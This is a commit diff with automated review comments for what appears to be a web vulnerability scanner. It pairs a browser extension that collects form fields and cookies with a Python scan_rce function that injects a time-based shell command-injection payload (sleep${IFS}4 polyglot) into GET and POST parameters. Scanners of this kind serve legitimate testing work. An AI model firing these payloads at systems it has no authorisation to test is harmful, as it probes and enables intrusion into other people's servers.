POST Scan RCE + Bugfix: Handling ALL data for POST
parent
d46a0edb79
commit
43e7eb8f06
@ -115,10 +115,12 @@ chrome.tabs.onUpdated.addListener(function(tabId,changeInfo, tab) {
// Detect value of inputs of the form
// Detect value of inputs of the form
post_data = '';
post_data = '';
for (var j = 0; j < document.forms[i-1].elements.length -1; j++) {
for (var j = 0; j < document.forms[i-1].elements.length; j++) {
post_data += (document.forms[i-1].elements[j].name+":"+document.forms[i-1].elements[j].value+"|");
post_data += (document.forms[i-1].elements[j].name+":"+document.forms[i-1].elements[j].value+"|");
console.log(post_data);
}
}
// Send data to this plugin (POST Scan) - check the method, GET is already handle with onUpdated
// Send data to this plugin (POST Scan) - check the method, GET is already handle with onUpdated
if(post_data != '' && document.forms[i-1].method.toUpperCase() == 'POST'){
if(post_data != '' && document.forms[i-1].method.toUpperCase() == 'POST'){
chrome.runtime.sendMessage({type: "scan_plz", data:post_data, url:document.location.href, cookie:document.cookie}, function() {});
chrome.runtime.sendMessage({type: "scan_plz", data:post_data, url:document.location.href, cookie:document.cookie}, function() {});
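Review bot: The new `console.log(post_data)` sits inside the element loop, so it prints the growing name:value string, including the value of any password input, to the page console on every iteration; debug output like this should not ship, so drop the line or at least skip fields whose `type` is `password` when building the string. The `name:value|` encoding built on the line above has no escaping, so a name or value containing `:` or `|` cannot be split back reliably on the receiving side; passing `data` as a name→value object (or a `JSON.stringify` of one) would avoid that, though the `scan_plz` consumer is outside this hunk and would have to change with it. The enclosing loop over `document.forms` and the listener callback both begin outside the hunk.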
@ -50,7 +50,7 @@ You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App
## TODO - Work in progress
## TODO - Work in progress
- Should detect target in source code.. (list of targets, then launch scan)
- Should detect target in source code.. (list of targets, then launch scan)
- Do scan_rce/xss for POST with data dict
- Do xss for POST with data dict
## Thanks
## Thanks
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
@ -159,21 +159,35 @@ def scan_rce(method, vulns, url, fuzz, cookie, useragent, data):
4 : commande introuvable
4 : commande introuvable
"""
"""
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4"
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4"
payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
payload_post = '`#\'|sleep${IFS}4|\'`"|sleep${IFS}4|";sleep${IFS}4'
payload_get = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
# Do a request and check the response time
# POST
inject = url.replace(fuzz+"=", fuzz+"="+payload)
if (method == 'POST'):
time1 = datetime.datetime.now()
inject = dict(data)
content = requests.get(inject, cookies=cookie, headers={'user-agent': useragent}).text
inject[fuzz] += payload_post
time1 = datetime.datetime.now()
content = requests.post(url, data=inject ,cookies=cookie, headers={'user-agent': useragent} ).text
# Change the inject to have a nice display in the plugin
inject = url + ":" + fuzz + ":" + inject[fuzz]
# GET
else:
# Do a request and check the response time
inject = url.replace(fuzz+"=", fuzz+"="+payload_get)
time1 = datetime.datetime.now()
content = requests.get(inject, cookies=cookie, headers={'user-agent': useragent}).text
# Check - The payload will force a delay of 5s at least.
time2 = datetime.datetime.now()
time2 = datetime.datetime.now()
diff = time2 - time1
diff = time2 - time1
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
# The payload will force a delay of 5s at least.
if diff > 2:
if diff > 2:
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload_get
vulns['rce'] += 1
vulns['rce'] += 1
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
else:
else:
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload_get
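Review bot: Both result messages at the end of the hunk print `payload_get` even when the new POST branch ran, so for a POST form the reported payload is not the one that was actually sent. Pick the payload once where the method is chosen, e.g. `payload = payload_post if method == 'POST' else payload_get`, and print `payload` in both the "RCE Detected" and "RCE Failed" lines; `vulns['list']` already records the correct `inject` string per branch. The POST branch's `inject[fuzz] += payload_post` also assumes `data` contains `fuzz` as a string key with a string value — a missing key raises KeyError and a `None` value raises TypeError — so `inject[fuzz] = (data.get(fuzz) or '') + payload_post` would be more tolerant of what the extension sends. The `def scan_rce` line is outside the hunk.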